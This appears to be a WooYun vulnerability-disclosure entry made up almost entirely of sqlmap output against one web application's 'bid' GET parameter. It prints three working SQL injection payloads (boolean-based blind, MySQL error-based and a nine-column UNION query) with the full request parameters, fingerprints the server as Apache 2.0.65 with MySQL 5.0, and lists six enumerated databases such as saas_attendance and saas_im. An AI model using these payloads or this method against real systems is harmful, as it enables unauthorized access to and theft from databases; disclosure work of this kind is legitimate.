WooYun.org

GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 65 HTTP(s) requests:
---
Parameter: bid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: bid=402880552acc07e2012acc09f7da08b8' AND 4901=4901 AND 
'DMVj'='DMVj&cid=ff8080812a881a21012a8984b2cb02a4&jsoncallback=jsonp1439763489697&pid=808a45bd6ff221157d2613549484ece2&=1439763494509
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=402880552acc07e2012acc09f7da08b8' AND (SELECT 2299 FROM(SELECT COUNT(*),CONCAT(0x71786b6271,(SELECT (ELT
(2299=2299,1))),0x7171787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 
'WwXw'='WwXw&cid=ff8080812a881a21012a8984b2cb02a4&jsoncallback=jsonp1439763489697&pid=808a45bd6ff221157d2613549484ece2&=1439763494509
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: bid=402880552acc07e2012acc09f7da08b8' UNION ALL SELECT NULL,CONCAT
(0x71786b6271,0x4a7876544541684a754f,0x7171787871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
&cid=ff8080812a881a21012a8984b2cb02a4&jsoncallback=jsonp1439763489697&pid=808a45bd6ff221157d2613549484ece2&=1439763494509
---
[10:25:09] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.65
back-end DBMS: MySQL 5.0
[10:25:09] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] saas_attendance
[*] saas_faq
[*] saas_im
[*] saas_new
[*] test
[10:25:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 35 times